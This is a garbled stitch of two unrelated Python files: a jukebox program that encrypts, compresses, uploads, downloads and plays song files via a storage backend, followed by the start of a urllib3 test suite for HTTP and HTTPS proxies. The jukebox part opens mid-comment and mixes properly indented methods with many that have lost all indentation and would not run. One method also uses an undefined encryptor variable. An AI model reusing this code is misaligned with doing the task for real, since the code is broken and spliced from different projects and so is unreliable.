# | | | | |
# | | | | |---- file extension (e.g., 'mp3')
# | | | |
# | | | |---- name of the song (' ' replaced with '-')
# | | |
# | | |---- name of the album (' ' replaced with '-')
# | |
# | |---- double dashes to separate the artist name and song name
# |
# |---- artist name (' ' replaced with '-')
#
# For example, the MP3 version of the song 'Under My Thumb' from artist 'The
# Rolling Stones' from the album 'Aftermath' should be named:
#
# The-Rolling-Stones--Aftermath--Under-My-Thumb.mp3
#
# first time use (or when new songs are added):
# (1) copy one or more song files to $JUKEBOX/song-import
# (2) import songs with command: 'python jukebox_main.py import-songs'
#
# show song listings:
# python jukebox_main.py list-songs
#
# play songs:
# python jukebox_main.py play
#
# ******************************************************************************
import datetime
import os
import os.path
if os.name == 'posix':
import signal
import sys
import time
import zlib
import random
from subprocess import Popen
import aes
import jukebox_db
import file_metadata
import song_metadata
import song_downloader
import utils
import json
# Module-level reference to the active Jukebox so the POSIX signal handlers
# can reach it; set by Jukebox.__init__.
g_jukebox_instance = None
def signal_handler(signum, frame):
    """Dispatch POSIX user signals to the active jukebox instance.

    SIGUSR1 toggles pause/play; SIGUSR2 skips to the next song.  Signals are
    ignored when no jukebox instance has been created yet.
    """
    if g_jukebox_instance is None:
        return
    if signum == signal.SIGUSR1:
        g_jukebox_instance.toggle_pause_play()
    elif signum == signal.SIGUSR2:
        g_jukebox_instance.advance_to_next_song()
class Jukebox:
    def __init__(self, jb_options, storage_sys, debug_print=False):
        """Set up jukebox state and the on-disk directory layout.

        :param jb_options: jukebox options (encryption/compression flags,
            cache size, debug mode, ...)
        :param storage_sys: abstract object-storage backend for songs,
            playlists, album art and the metadata DB
        :param debug_print: when True, print verbose diagnostics
        """
        global g_jukebox_instance
        # publish this instance so the module-level signal handlers can find it
        g_jukebox_instance = self
        self.jukebox_options = jb_options
        self.storage_system = storage_sys
        self.debug_print = debug_print
        # DB handle is opened in __enter__ (after the metadata DB download)
        self.jukebox_db = None
        self.current_dir = os.getcwd()
        # working directories, all relative to the current directory
        self.song_import_dir = os.path.join(self.current_dir, 'song-import')
        self.playlist_import_dir = os.path.join(self.current_dir, 'playlist-import')
        self.song_play_dir = os.path.join(self.current_dir, 'song-play')
        self.album_art_import_dir = os.path.join(self.current_dir, 'album-art-import')
        self.download_extension = ".download"
        # storage-system object/container names
        self.metadata_db_file = 'jukebox_db.sqlite3'
        self.metadata_container = 'music-metadata'
        self.playlist_container = 'playlists'
        self.album_art_container = 'album-art'
        # playback state
        self.song_list = []
        self.number_songs = 0
        self.song_index = -1
        self.audio_player_command_args = []
        self.audio_player_popen = None
        # fallback play duration used when no audio player is available
        self.song_play_length_seconds = 20
        # download throughput accounting
        self.cumulative_download_bytes = 0
        self.cumulative_download_time = 0
        self.exit_requested = False
        self.is_paused = False
        self.song_start_time = 0
        self.song_seconds_offset = 0
        if jb_options is not None and jb_options.debug_mode:
            self.debug_print = True
        if self.debug_print:
            print("self.current_dir = '%s'" % self.current_dir)
            print("self.song_import_dir = '%s'" % self.song_import_dir)
            print("self.song_play_dir = '%s'" % self.song_play_dir)
    def __enter__(self):
        """Fetch the latest metadata DB from storage (unless suppressed) and open it.

        Always returns self; a failed DB open is only reported, not raised.
        """
        # look for stored metadata in the storage system
        if self.storage_system is not None and \
                self.storage_system.has_container(self.metadata_container) and \
                not self.jukebox_options.suppress_metadata_download:
            # metadata container exists, retrieve container listing
            container_contents = self.storage_system.list_container_contents(self.metadata_container)
            # does our metadata DB file exist in the metadata container?
            if container_contents is not None and self.metadata_db_file in container_contents:
                # download it (to a temp name so a failed download can't
                # clobber the existing local DB)
                metadata_db_file_path = self.get_metadata_db_file_path()
                download_file = metadata_db_file_path + ".download"
                if self.storage_system.get_object(self.metadata_container, self.metadata_db_file, download_file) > 0:
                    # have an existing metadata DB file?
                    if os.path.exists(metadata_db_file_path):
                        if self.debug_print:
                            print("deleting existing metadata DB file")
                        os.remove(metadata_db_file_path)
                    # rename downloaded file
                    if self.debug_print:
                        print("renaming '%s' to '%s'" % (download_file, metadata_db_file_path))
                    os.rename(download_file, metadata_db_file_path)
                else:
                    if self.debug_print:
                        print("error: unable to retrieve metadata DB file")
            else:
                if self.debug_print:
                    print("no metadata DB file in metadata container")
        else:
            if self.debug_print:
                print("no metadata container in storage system")
        self.jukebox_db = jukebox_db.JukeboxDB(self.get_metadata_db_file_path())
        # NOTE(review): a failed open is only printed, not raised — callers
        # will proceed with an unusable DB handle; confirm this is intended.
        if not self.jukebox_db.open():
            print("unable to connect to database")
        return self
def __exit__(self, exception_type, exception_value, traceback):
if self.jukebox_db is not None:
if self.jukebox_db.is_open():
self.jukebox_db.close()
self.jukebox_db = None
def install_signal_handlers(self):
if os.name == 'posix':
signal.signal(signal.SIGUSR1, signal_handler)
signal.signal(signal.SIGUSR2, signal_handler)
def toggle_pause_play(self):
self.is_paused = not self.is_paused
if self.is_paused:
print("paused")
if self.audio_player_popen is not None:
# capture current song position (seconds into song)
self.audio_player_popen.terminate()
else:
print("resuming play")
def advance_to_next_song(self):
print("advancing to next song")
if self.audio_player_popen is not None:
self.audio_player_popen.terminate()
def get_metadata_db_file_path(self):
return os.path.join(self.current_dir, self.metadata_db_file)
@staticmethod
def unencode_value(encoded_value):
return encoded_value.replace('-', ' ')
@staticmethod
def encode_value(value):
return value.replace(' ', '-')
def components_from_file_name(self, file_name):
pos_extension = file_name.find('.')
if pos_extension > -1:
base_file_name = file_name[0:pos_extension]
else:
base_file_name = file_name
components = base_file_name.split('--')
if len(components) == 3:
encoded_artist = components[0]
encoded_album = components[1]
encoded_song = components[2]
return [self.unencode_value(encoded_artist),
self.unencode_value(encoded_album),
self.unencode_value(encoded_song)]
else:
return None
def artist_from_file_name(self, file_name):
if file_name is not None and file_name:
components = self.components_from_file_name(file_name)
if components is not None and len(components) == 3:
return components[0]
return None
def album_from_file_name(self, file_name):
if file_name is not None and file_name:
components = self.components_from_file_name(file_name)
if components is not None and len(components) == 3:
return components[1]
return None
def song_from_file_name(self, file_name):
if file_name is not None and file_name:
components = self.components_from_file_name(file_name)
if components is not None and len(components) == 3:
return components[2]
return None
def store_song_metadata(self, fs_song):
db_song = self.jukebox_db.retrieve_song(fs_song.fm.file_uid)
if db_song is not None:
if fs_song != db_song:
return self.jukebox_db.update_song(fs_song)
else:
return True # no insert or update needed (already up-to-date)
else:
# song is not in the database, insert it
return self.jukebox_db.insert_song(fs_song)
def store_song_playlist(self, file_name, file_contents):
pl = json.loads(file_contents)
if 'name' in pl.keys():
pl_name = pl['name']
pl_uid = file_name
return self.jukebox_db.insert_playlist(pl_uid, pl_name)
else:
return False
def get_encryptor(self):
# key_block_size = 16 # AES-128
# key_block_size = 24 # AES-192
key_block_size = 32 # AES-256
return aes.AESBlockEncryption(key_block_size,
self.jukebox_options.encryption_key,
self.jukebox_options.encryption_iv)
def container_suffix(self):
suffix = ""
if self.jukebox_options.use_encryption and self.jukebox_options.use_compression:
suffix += "-ez"
elif self.jukebox_options.use_encryption:
suffix += "-e"
elif self.jukebox_options.use_compression:
suffix += "-z"
return suffix
def object_file_suffix(self):
suffix = ""
if self.jukebox_options.use_encryption and self.jukebox_options.use_compression:
suffix = ".egz"
elif self.jukebox_options.use_encryption:
suffix = ".e"
elif self.jukebox_options.use_compression:
suffix = ".gz"
return suffix
def container_for_song(self, song_uid):
if song_uid is None or len(song_uid) == 0:
return None
container_suffix = "-artist-songs" + self.container_suffix()
artist = self.artist_from_file_name(song_uid)
if artist.startswith('A '):
artist_letter = artist[2:3]
elif artist.startswith('The '):
artist_letter = artist[4:5]
else:
artist_letter = artist[0:1]
return artist_letter.lower() + container_suffix
    def import_songs(self):
        """Upload every valid song file in song-import to storage and record
        its metadata, printing a progress bar unless debug output is on.

        A song that uploads but fails the local metadata insert is deleted
        from storage again (it would otherwise be unreachable).

        NOTE(review): files are opened in text mode ('r') and then handed to
        zlib.compress / the AES encryptor, and padding uses a str — under
        Python 3 those paths expect bytes; confirm before running on py3.
        """
        if self.jukebox_db is not None and self.jukebox_db.is_open():
            dir_listing = os.listdir(self.song_import_dir)
            num_entries = float(len(dir_listing))
            progressbar_chars = 0.0
            progressbar_width = 40
            progresschars_per_iteration = progressbar_width / num_entries
            progressbar_char = '#'
            bar_chars = 0
            if not self.debug_print:
                # setup progressbar
                sys.stdout.write("[%s]" % (" " * progressbar_width))
                sys.stdout.flush()
                sys.stdout.write("\b" * (progressbar_width + 1))  # return to start of line, after '['
            if self.jukebox_options is not None and self.jukebox_options.use_encryption:
                encryption = self.get_encryptor()
            else:
                encryption = None
            cumulative_upload_time = 0
            cumulative_upload_bytes = 0
            file_import_count = 0
            for listing_entry in dir_listing:
                full_path = os.path.join(self.song_import_dir, listing_entry)
                # ignore it if it's not a file
                if os.path.isfile(full_path):
                    file_name = listing_entry
                    extension = os.path.splitext(full_path)[1]
                    if extension:
                        file_size = os.path.getsize(full_path)
                        artist = self.artist_from_file_name(file_name)
                        album = self.album_from_file_name(file_name)
                        song = self.song_from_file_name(file_name)
                        if file_size > 0 and artist is not None and album is not None and song is not None:
                            # build the metadata record for this file
                            object_name = file_name + self.object_file_suffix()
                            fs_song = song_metadata.SongMetadata()
                            fs_song.fm = file_metadata.FileMetadata()
                            fs_song.fm.file_uid = object_name
                            fs_song.album_uid = None
                            fs_song.fm.origin_file_size = file_size
                            fs_song.fm.file_time = datetime.datetime.fromtimestamp(os.path.getmtime(full_path))
                            fs_song.artist_name = artist
                            fs_song.song_name = song
                            fs_song.fm.md5_hash = utils.md5_for_file(full_path)
                            fs_song.fm.compressed = self.jukebox_options.use_compression
                            fs_song.fm.encrypted = self.jukebox_options.use_encryption
                            fs_song.fm.object_name = object_name
                            fs_song.fm.pad_char_count = 0
                            fs_song.fm.container_name = self.container_for_song(file_name)
                            # read file contents
                            file_read = False
                            file_contents = None
                            try:
                                with open(full_path, 'r') as content_file:
                                    file_contents = content_file.read()
                                    file_read = True
                            except IOError:
                                print("error: unable to read file %s" % full_path)
                            if file_read and file_contents is not None:
                                if file_contents:
                                    # for general purposes, it might be useful or helpful to have
                                    # a minimum size for compressing
                                    if self.jukebox_options.use_compression:
                                        if self.debug_print:
                                            print("compressing file")
                                        file_contents = zlib.compress(file_contents, 9)
                                    if self.jukebox_options.use_encryption:
                                        if self.debug_print:
                                            print("encrypting file")
                                        # the length of the data to encrypt must be a multiple of 16
                                        num_extra_chars = len(file_contents) % 16
                                        if num_extra_chars > 0:
                                            if self.debug_print:
                                                print("padding file for encryption")
                                            num_pad_chars = 16 - num_extra_chars
                                            file_contents += "".ljust(num_pad_chars, ' ')
                                            fs_song.fm.pad_char_count = num_pad_chars
                                        file_contents = encryption.encrypt(file_contents)
                                # now that we have the data that will be stored, set the file size for
                                # what's being stored
                                fs_song.fm.stored_file_size = len(file_contents)
                                start_upload_time = time.time()
                                # store song file to storage system
                                if self.storage_system.put_object(fs_song.fm.container_name,
                                                                  fs_song.fm.object_name,
                                                                  file_contents):
                                    end_upload_time = time.time()
                                    upload_elapsed_time = end_upload_time - start_upload_time
                                    cumulative_upload_time += upload_elapsed_time
                                    cumulative_upload_bytes += len(file_contents)
                                    # store song metadata in local database
                                    if not self.store_song_metadata(fs_song):
                                        # we stored the song to the storage system, but were unable to store
                                        # the metadata in the local database. we need to delete the song
                                        # from the storage system since we won't have any way to access it
                                        # since we can't store the song metadata locally.
                                        self.storage_system.delete_object(fs_song.fm.container_name,
                                                                          fs_song.fm.object_name)
                                    else:
                                        file_import_count += 1
                if not self.debug_print:
                    # advance the progress bar one entry's worth
                    progressbar_chars += progresschars_per_iteration
                    if int(progressbar_chars) > bar_chars:
                        num_new_chars = int(progressbar_chars) - bar_chars
                        if num_new_chars > 0:
                            # update progress bar
                            for j in iter(range(num_new_chars)):
                                sys.stdout.write(progressbar_char)
                            sys.stdout.flush()
                            bar_chars += num_new_chars
            if not self.debug_print:
                # if we haven't filled up the progress bar, fill it now
                if bar_chars < progressbar_width:
                    num_new_chars = progressbar_width - bar_chars
                    for j in iter(range(num_new_chars)):
                        sys.stdout.write(progressbar_char)
                    sys.stdout.flush()
                sys.stdout.write("\n")
            if file_import_count > 0:
                self.upload_metadata_db()
                print("%s song files imported" % file_import_count)
            if cumulative_upload_time > 0:
                cumulative_upload_kb = cumulative_upload_bytes / 1000.0
                print("average upload throughput = %s KB/sec" % (int(cumulative_upload_kb / cumulative_upload_time)))
def song_path_in_playlist(self, song):
return os.path.join(self.song_play_dir, song.fm.file_uid)
    def check_file_integrity(self, song):
        """Verify a downloaded song file against its stored MD5 hash.

        Returns True when the hash matches or integrity checking is disabled;
        False when the hash differs or the file is missing.

        NOTE(review): this compares against ``song.md5`` while import stores
        the hash as ``song.fm.md5_hash`` — confirm SongMetadata exposes both.
        """
        file_integrity_passed = True
        if self.jukebox_options is not None and self.jukebox_options.check_data_integrity:
            file_path = self.song_path_in_playlist(song)
            if os.path.exists(file_path):
                if self.debug_print:
                    print("checking integrity for %s" % song.fm.file_uid)
                playlist_md5 = utils.md5_for_file(file_path)
                if playlist_md5 == song.md5:
                    if self.debug_print:
                        print("integrity check SUCCESS")
                    file_integrity_passed = True
                else:
                    print("file integrity check failed: %s" % song.fm.file_uid)
                    file_integrity_passed = False
            else:
                # file doesn't exist
                print("file doesn't exist")
                file_integrity_passed = False
        else:
            if self.debug_print:
                print("file integrity bypassed, no jukebox options or check integrity not turned on")
        return file_integrity_passed
def batch_download_start(self):
self.cumulative_download_bytes = 0
self.cumulative_download_time = 0
def batch_download_complete(self):
if not self.exit_requested:
if self.cumulative_download_time > 0:
cumulative_download_kb = self.cumulative_download_bytes / 1000.0
print("average download throughput = %s KB/sec" % (
int(cumulative_download_kb / self.cumulative_download_time)))
self.cumulative_download_bytes = 0
self.cumulative_download_time = 0
    def download_song(self, song):
        """Fetch *song* into the play directory, undoing encryption/compression.

        Returns True on success; False on any failure (a file that fails the
        final integrity check is removed).  Aborts early and returns False if
        shutdown has been requested.

        NOTE(review): the size check reads ``song.stored_file_size`` while
        import sets ``song.fm.stored_file_size`` — confirm the attribute.
        """
        if self.exit_requested:
            return False
        if song is not None:
            file_path = self.song_path_in_playlist(song)
            download_start_time = time.time()
            song_bytes_retrieved = self.storage_system.retrieve_file(song.fm, self.song_play_dir)
            if self.exit_requested:
                return False
            if self.debug_print:
                print("bytes retrieved: %s" % song_bytes_retrieved)
            if song_bytes_retrieved > 0:
                download_end_time = time.time()
                download_elapsed_time = download_end_time - download_start_time
                self.cumulative_download_time += download_elapsed_time
                self.cumulative_download_bytes += song_bytes_retrieved
                # are we checking data integrity?
                # if so, verify that the storage system retrieved the same length that has been stored
                if self.jukebox_options is not None and self.jukebox_options.check_data_integrity:
                    if self.debug_print:
                        print("verifying data integrity")
                    if song_bytes_retrieved != song.stored_file_size:
                        print("error: data integrity check failed for '%s'" % file_path)
                        return False
                # is it encrypted? if so, unencrypt it
                encrypted = song.fm.encrypted
                compressed = song.fm.compressed
                if encrypted or compressed:
                    try:
                        with open(file_path, 'rb') as content_file:
                            file_contents = content_file.read()
                    except IOError:
                        print("error: unable to read file %s" % file_path)
                        return False
                    # decrypt first, then decompress (reverse of import order)
                    if encrypted:
                        encryption = self.get_encryptor()
                        file_contents = encryption.decrypt(file_contents)
                    if compressed:
                        file_contents = zlib.decompress(file_contents)
                    # re-write out the uncompressed, unencrypted file contents
                    try:
                        with open(file_path, 'wb') as content_file:
                            content_file.write(file_contents)
                    except IOError:
                        print("error: unable to write unencrypted/uncompressed file '%s'" % file_path)
                        return False
                if self.check_file_integrity(song):
                    return True
                else:
                    # we retrieved the file, but it failed our integrity check
                    # if file exists, remove it
                    if os.path.exists(file_path):
                        os.remove(file_path)
        return False
    def play_song(self, song_file_path):
        """Play one song file with the configured audio player.

        Falls back to sleeping for song_play_length_seconds when no player is
        configured or the player cannot be started.  The song file is deleted
        afterwards unless playback is paused; a missing file is appended to
        404.txt.
        """
        if os.path.exists(song_file_path):
            print("playing %s" % song_file_path)
            if self.audio_player_command_args:
                # copy the base command so the file argument isn't accumulated
                cmd_args = self.audio_player_command_args[:]
                cmd_args.append(song_file_path)
                exit_code = -1
                started_audio_player = False
                try:
                    audio_player_proc = Popen(cmd_args)
                    if audio_player_proc is not None:
                        started_audio_player = True
                        self.song_start_time = time.time()
                        # expose the process so pause/skip handlers can terminate it
                        self.audio_player_popen = audio_player_proc
                        exit_code = audio_player_proc.wait()
                        self.audio_player_popen = None
                except OSError:
                    # audio player not available
                    self.audio_player_command_args = []
                    self.audio_player_popen = None
                    exit_code = -1
                # if the audio player failed or is not present, just sleep
                # for the length of time that audio would be played
                if not started_audio_player and exit_code != 0:
                    time.sleep(self.song_play_length_seconds)
            else:
                # we don't know about an audio player, so simulate a
                # song being played by sleeping
                time.sleep(self.song_play_length_seconds)
            if not self.is_paused:
                # delete the song file from the play list directory
                os.remove(song_file_path)
        else:
            print("song file doesn't exist: '%s'" % song_file_path)
            # log the missing file for later diagnosis
            with open("404.txt", "a+") as f:
                f.write("%s\n" % song_file_path)
def download_songs(self):
# scan the play list directory to see if we need to download more songs
dir_listing = os.listdir(self.song_play_dir)
song_file_count = 0
for listing_entry in dir_listing:
full_path = os.path.join(self.song_play_dir, listing_entry)
if os.path.isfile(full_path):
extension = os.path.splitext(full_path)[1]
if extension and extension != self.download_extension:
song_file_count += 1
file_cache_count = self.jukebox_options.file_cache_count
if song_file_count < file_cache_count:
dl_songs = []
# start looking at the next song in the list
check_index = self.song_index + 1
for j in iter(range(self.number_songs)):
if check_index >= self.number_songs:
check_index = 0
if check_index != self.song_index:
si = self.song_list[check_index]
file_path = self.song_path_in_playlist(si)
if not os.path.exists(file_path):
dl_songs.append(si)
if len(dl_songs) >= file_cache_count:
break
check_index += 1
if dl_songs:
download_thread = song_downloader.SongDownloader(self, dl_songs)
download_thread.start()
    def play_songs(self, shuffle=False, artist=None, album=None):
        """Main playback loop: prepare the play directory and play songs forever.

        Retrieves the song list (optionally filtered by artist/album), empties
        or creates the play-list directory, picks a platform-appropriate audio
        player command, downloads the first song and then loops downloading
        and playing until interrupted with Ctrl-C. Exits the process when the
        jukebox is empty or the first download fails.

        :param shuffle: when True, play the songs in random order
        :param artist: optional artist-name filter for the song list
        :param album: optional album-name filter for the song list
        """
        self.song_list = self.jukebox_db.retrieve_songs(artist, album)
        if self.song_list is not None:
            self.number_songs = len(self.song_list)
            if self.number_songs == 0:
                print("no songs in jukebox")
                sys.exit(0)
            # does play list directory exist?
            if not os.path.exists(self.song_play_dir):
                if self.debug_print:
                    print("song-play directory does not exist, creating it")
                os.makedirs(self.song_play_dir)
            else:
                # play list directory exists, delete any files in it
                if self.debug_print:
                    print("deleting existing files in song-play directory")
                for theFile in os.listdir(self.song_play_dir):
                    file_path = os.path.join(self.song_play_dir, theFile)
                    try:
                        if os.path.isfile(file_path):
                            os.unlink(file_path)
                    except OSError:
                        # best effort: a file we cannot delete is simply left behind
                        pass
            self.song_index = 0
            self.install_signal_handlers()
            # pick an audio player command line appropriate for this platform
            if sys.platform == "darwin":
                self.audio_player_command_args = ["afplay"]
                #self.audio_player_command_args.extend(["-t", str(self.song_play_length_seconds)])
            elif os.name == "posix":
                self.audio_player_command_args = ["mplayer", "-nolirc", "-really-quiet"]
                #self.audio_player_command_args.extend(["-endpos", str(self.song_play_length_seconds)])
            elif sys.platform == "win32":
                # we really need command-line support for /play and /close arguments. unfortunately,
                # this support used to be available in the built-in windows media player, but is
                # no longer present.
                # self.audio_player_command_args = ["C:\Program Files\Windows Media Player\wmplayer.exe"]
                self.audio_player_command_args = ["C:\\Program Files\\MPC-HC\\mpc-hc64.exe",
                                                  "/play", "/close", "/minimized"]
            else:
                self.audio_player_command_args = []
            print("downloading first song...")
            if shuffle:
                self.song_list = random.sample(self.song_list, len(self.song_list))
            try:
                if self.download_song(self.song_list[0]):
                    print("first song downloaded. starting playing now.")
                    # record our pid so external tools can signal the jukebox
                    with open("jukebox.pid", "w") as f:
                        f.write('%d\n' % os.getpid())
                    while True:
                        if not self.exit_requested:
                            if not self.is_paused:
                                self.download_songs()
                                self.play_song(self.song_path_in_playlist(self.song_list[self.song_index]))
                            if not self.is_paused:
                                self.song_index += 1
                                if self.song_index >= self.number_songs:
                                    self.song_index = 0
                        else:
                            time.sleep(1)
                    # NOTE(review): unreachable — the while-loop above never
                    # breaks; cleanup happens in the KeyboardInterrupt handler
                    os.remove("jukebox.pid")
                else:
                    print("error: unable to download songs")
                    sys.exit(1)
            except KeyboardInterrupt:
                print("\nexiting jukebox")
                os.remove("jukebox.pid")
                self.exit_requested = True
def show_list_containers(self):
if self.storage_system is not None:
if self.storage_system.list_containers is not None:
for container_name in self.storage_system.list_containers:
print(container_name)
def show_listings(self):
if self.jukebox_db is not None:
self.jukebox_db.show_listings()
def show_artists(self):
if self.jukebox_db is not None:
self.jukebox_db.show_artists()
def show_genres(self):
if self.jukebox_db is not None:
self.jukebox_db.show_genres()
def show_albums(self):
if self.jukebox_db is not None:
self.jukebox_db.show_albums()
def read_file_contents(self, file_path, allow_encryption=True):
file_read = False
file_contents = None
pad_chars = 0
try:
with open(file_path, 'r') as content_file:
file_contents = content_file.read()
file_read = True
except IOError:
print("error: unable to read file %s" % file_path)
if file_read and file_contents is not None:
if file_contents:
# for general purposes, it might be useful or helpful to have
# a minimum size for compressing
if self.jukebox_options.use_compression:
if self.debug_print:
print("compressing file")
file_contents = zlib.compress(file_contents, 9)
if allow_encryption and self.jukebox_options.use_encryption:
if self.debug_print:
print("encrypting file")
# the length of the data to encrypt must be a multiple of 16
num_extra_chars = len(file_contents) % 16
if num_extra_chars > 0:
if self.debug_print:
print("padding file for encryption")
pad_chars = 16 - num_extra_chars
file_contents += "".ljust(pad_chars, ' ')
file_contents = encryption.encrypt(file_contents)
return file_read, file_contents, pad_chars
    def upload_metadata_db(self):
        """Upload the local metadata database file to the storage system.

        Closes the local DB handle first so pending writes are flushed to
        disk, then uploads the DB file into the metadata container (creating
        the container on first use).

        :return: True when the upload succeeded, False otherwise
        """
        metadata_db_upload = False
        if not self.storage_system.has_container(self.metadata_container):
            have_metadata_container = self.storage_system.create_container(self.metadata_container)
        else:
            have_metadata_container = True
        if have_metadata_container:
            if self.debug_print:
                print("uploading metadata db file to storage system")
            # close the DB so the on-disk file is consistent before reading it
            # NOTE(review): the handle is left closed (None) after the upload;
            # callers appear to rely on this — confirm before changing.
            self.jukebox_db.close()
            self.jukebox_db = None
            db_file_contents = ''
            with open(self.get_metadata_db_file_path(), 'r') as db_file:
                db_file_contents = db_file.read()
            metadata_db_upload = self.storage_system.put_object(self.metadata_container,
                                                                self.metadata_db_file,
                                                                db_file_contents)
            if self.debug_print:
                if metadata_db_upload:
                    print("metadata db file uploaded")
                else:
                    print("unable to upload metadata db file")
        return metadata_db_upload
    def import_playlists(self):
        """Import playlist files from the import directory into storage and DB.

        Each regular file in the playlist import directory is uploaded to the
        playlist container and recorded in the metadata database; when the DB
        insert fails the uploaded object is rolled back. After at least one
        successful import the metadata DB file is re-uploaded.
        """
        if self.jukebox_db is not None and self.jukebox_db.is_open():
            file_import_count = 0
            dir_listing = os.listdir(self.playlist_import_dir)
            if len(dir_listing) == 0:
                print("no playlists found")
                return
            if not self.storage_system.has_container(self.playlist_container):
                have_container = self.storage_system.create_container(self.playlist_container)
            else:
                have_container = True
            if not have_container:
                print("error: unable to create container for playlists. unable to import")
                return
            for listing_entry in dir_listing:
                full_path = os.path.join(self.playlist_import_dir, listing_entry)
                # ignore it if it's not a file
                if os.path.isfile(full_path):
                    object_name = listing_entry
                    file_read, file_contents, _ = self.read_file_contents(full_path)
                    if file_read and file_contents is not None:
                        if self.storage_system.put_object(self.playlist_container,
                                                          object_name,
                                                          file_contents):
                            print("put of playlist succeeded")
                            if not self.store_song_playlist(object_name, file_contents):
                                print("storing of playlist to db failed")
                                # roll back the storage upload when the DB insert fails
                                self.storage_system.delete_object(self.playlist_container,
                                                                  object_name)
                            else:
                                print("storing of playlist succeeded")
                                file_import_count += 1
            if file_import_count > 0:
                print("%d playlists imported" % file_import_count)
                # upload metadata DB file
                self.upload_metadata_db()
            else:
                print("no files imported")
def show_playlists(self):
if self.jukebox_db is not None:
self.jukebox_db.show_playlists()
def show_playlist(self, playlist):
print("TODO: implement jukebox.py:show_playlist")
def play_playlist(self, playlist):
print("TODO: implement jukebox.py:play_playlist")
def delete_song(self, song_uid, upload_metadata=True):
is_deleted = False
if song_uid is not None and len(song_uid) > 0:
db_deleted = self.jukebox_db.delete_song(song_uid)
container = self.container_for_song(song_uid)
ss_deleted = False
if container is not None and len(container) > 0:
ss_deleted = self.storage_system.delete_object(container, song_uid)
if db_deleted and upload_metadata:
self.upload_metadata_db()
is_deleted = db_deleted or ss_deleted
return is_deleted
def delete_artist(self, artist):
is_deleted = False
if artist is not None and len(artist) > 0:
song_list = self.jukebox_db.retrieve_songs(artist)
if song_list is not None:
if len(song_list) == 0:
print("no songs in jukebox")
sys.exit(0)
else:
for song in song_list:
if not self.delete_song(song.fm.object_name, False):
print("error deleting song '%s'" % song.fm.object_name)
sys.exit(1)
self.upload_metadata_db()
is_deleted = True
else:
print("no songs in jukebox")
sys.exit(0)
return is_deleted
def delete_album(self, album):
#TODO: implement delete_album
return False
    def delete_playlist(self, playlist_name):
        """Delete a playlist from the metadata DB and the storage system.

        The DB row is deleted first; only when that succeeds is the stored
        playlist object removed. After a full delete the metadata DB file is
        re-uploaded.

        :param playlist_name: name of the playlist to delete
        :return: True when both the DB row and the stored object were removed
        """
        is_deleted = False
        object_name = self.jukebox_db.get_playlist(playlist_name)
        if object_name is not None and len(object_name) > 0:
            object_deleted = False
            db_deleted = self.jukebox_db.delete_playlist(playlist_name)
            if db_deleted:
                print("container='%s', object='%s'" % (self.playlist_container, object_name))
                object_deleted = self.storage_system.delete_object(self.playlist_container,
                                                                   object_name)
                if object_deleted:
                    is_deleted = True
                else:
                    print("error: object delete failed")
            else:
                print("error: database delete failed")
            if is_deleted:
                self.upload_metadata_db()
            else:
                print("delete of playlist failed")
        else:
            print("invalid playlist name")
        return is_deleted
    def import_album_art(self):
        """Import album-art files from the import directory into storage.

        Each regular file in the album-art import directory is uploaded to the
        album-art container under its original file name. Unlike playlist
        import, nothing is recorded in the metadata database.
        """
        if self.jukebox_db is not None and self.jukebox_db.is_open():
            file_import_count = 0
            dir_listing = os.listdir(self.album_art_import_dir)
            if len(dir_listing) == 0:
                print("no album art found")
                return
            if not self.storage_system.has_container(self.album_art_container):
                have_container = self.storage_system.create_container(self.album_art_container)
            else:
                have_container = True
            if not have_container:
                print("error: unable to create container for album art. unable to import")
                return
            for listing_entry in dir_listing:
                full_path = os.path.join(self.album_art_import_dir, listing_entry)
                # ignore it if it's not a file
                if os.path.isfile(full_path):
                    object_name = listing_entry
                    file_read, file_contents, _ = self.read_file_contents(full_path)
                    if file_read and file_contents is not None:
                        if self.storage_system.put_object(self.album_art_container,
                                                          object_name,
                                                          file_contents):
                            file_import_count += 1
            if file_import_count > 0:
                print("%d album art files imported" % file_import_count)
            else:
                print("no files imported")
| |
import os.path
import shutil
import socket
import ssl
import tempfile
from test import LONG_TIMEOUT, SHORT_TIMEOUT, onlySecureTransport, withPyOpenSSL
import pytest
import trustme
import urllib3.exceptions
from dummyserver.server import DEFAULT_CA, HAS_IPV6, get_unreachable_address
from dummyserver.testcase import HTTPDummyProxyTestCase, IPv6HTTPDummyProxyTestCase
from urllib3 import HTTPResponse
from urllib3._collections import HTTPHeaderDict
from urllib3.connection import VerifiedHTTPSConnection
from urllib3.connectionpool import connection_from_url
from urllib3.exceptions import (
ConnectTimeoutError,
MaxRetryError,
ProxyError,
ProxySchemeUnknown,
ProxySchemeUnsupported,
ReadTimeoutError,
SSLError,
)
from urllib3.poolmanager import ProxyManager, proxy_from_url
from urllib3.util.ssl_ import create_urllib3_context
from urllib3.util.timeout import Timeout
from .. import TARPIT_HOST, requires_network
# Retry failed tests
pytestmark = pytest.mark.flaky
class TestHTTPProxyManager(HTTPDummyProxyTestCase):
    """Integration tests for ProxyManager against dummy HTTP/HTTPS proxies.

    Covers forwarding (HTTP targets) and tunneling (HTTPS targets) through
    both HTTP and HTTPS proxies, plus header propagation, connection pooling,
    redirects, certificate verification and timeout/error propagation.
    """

    @classmethod
    def setup_class(cls) -> None:
        """Build target/proxy URLs and a throwaway CA for negative TLS tests."""
        super().setup_class()
        cls.http_url = f"http://{cls.http_host}:{int(cls.http_port)}"
        cls.http_url_alt = f"http://{cls.http_host_alt}:{int(cls.http_port)}"
        cls.https_url = f"https://{cls.https_host}:{int(cls.https_port)}"
        cls.https_url_alt = f"https://{cls.https_host_alt}:{int(cls.https_port)}"
        cls.proxy_url = f"http://{cls.proxy_host}:{int(cls.proxy_port)}"
        cls.https_proxy_url = f"https://{cls.proxy_host}:{int(cls.https_proxy_port)}"

        # Generate another CA to test verification failure
        cls.certs_dir = tempfile.mkdtemp()
        bad_ca = trustme.CA()

        cls.bad_ca_path = os.path.join(cls.certs_dir, "ca_bad.pem")
        bad_ca.cert_pem.write_to_path(cls.bad_ca_path)

    @classmethod
    def teardown_class(cls) -> None:
        """Remove the temporary CA directory created in setup_class."""
        super().teardown_class()
        shutil.rmtree(cls.certs_dir)

    def test_basic_proxy(self) -> None:
        """HTTP proxy can reach both HTTP and HTTPS targets."""
        with proxy_from_url(self.proxy_url, ca_certs=DEFAULT_CA) as http:
            r = http.request("GET", f"{self.http_url}/")
            assert r.status == 200

            r = http.request("GET", f"{self.https_url}/")
            assert r.status == 200

    def test_https_proxy(self) -> None:
        """HTTPS proxy can reach both HTTPS and HTTP targets."""
        with proxy_from_url(self.https_proxy_url, ca_certs=DEFAULT_CA) as https:
            r = https.request("GET", f"{self.https_url}/")
            assert r.status == 200

